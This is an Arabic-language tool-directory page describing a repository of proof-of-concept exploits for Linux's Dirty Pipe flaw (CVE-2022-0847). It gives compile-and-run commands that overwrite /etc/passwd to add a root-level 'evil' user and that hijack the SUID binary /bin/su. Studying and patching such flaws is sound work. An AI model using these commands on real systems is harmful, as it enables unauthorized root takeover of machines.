Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Dirty-Pipe-CVE-2022-0847-POCs — استغلالات إثبات مفهوم لثغرة CVE-2022-0847 (Dirty Pipe) تتيح تصعيد الصلاحيات المحلية على أنوية Linux 5.8+ عن طريق الكتابة فوق الملفات للقراءة فقط أو ثنائيات SUID. | Kitploit
أدوات/GitHubGitHub/ajith737/dirty-pipe-cve-2022-0847-pocs
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubajith737/dirty-pipe-cve-2022-0847-pocs

Dirty-Pipe-CVE-2022-0847-POCs

استغلالات إثبات مفهوم لثغرة CVE-2022-0847 (Dirty Pipe) تتيح تصعيد الصلاحيات المحلية على أنوية Linux 5.8+ عن طريق الكتابة فوق الملفات للقراءة فقط أو ثنائيات SUID.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
31منذ 3 سنواتلم تتم المراجعة بعد

Dirty-Pipe-CVE-2022-0847-POCs

  • المؤلف: Max Kellermann [email protected]
  • المساهم: Bl4sty https://twitter.com/bl4sty ثغرة جديدة في لينكس تُعرف باسم 'Dirty Pipe' تسمح للمستخدمين المحليين بالحصول على صلاحيات الجذر عبر استغلالات متاحة للعموم.

اليوم، كشف الباحث الأمني Max Kellermann بشكل مسؤول عن ثغرة 'Dirty Pipe' وذكر أنها تؤثر على Linux Kernel 5.8 والإصدارات الأحدث، حتى على أجهزة أندرويد.

تُتتبع الثغرة برقم CVE-2022-0847 وتسمح لمستخدم غير مميَّز بحقن البيانات والكتابة فوقها في الملفات للقراءة فقط، بما في ذلك عمليات SUID التي تعمل بصلاحيات الجذر.

اكتشف Kellerman الثغرة بعد تعقبه خطأ كان يُفسد سجلات الوصول لخادم الويب لدى أحد عملائه.

ثم كتب Bl4sty نسخة أخرى. فبدلاً من الكتابة فوق ملف مثل /etc/passwd، تكتب فوق ملف ثنائي SUID يحدده المستخدم (مثل /bin/su)، محقنةً شيفرة shellcode تُنفَّذ بعد ذلك بصلاحيات مستخدم مميَّز (أي الجذر).

الاستغلال 1

┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1 
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'

الاستغلال 2

┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su

للاستخدام المفصل، راجع: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf

تنزيل الأداة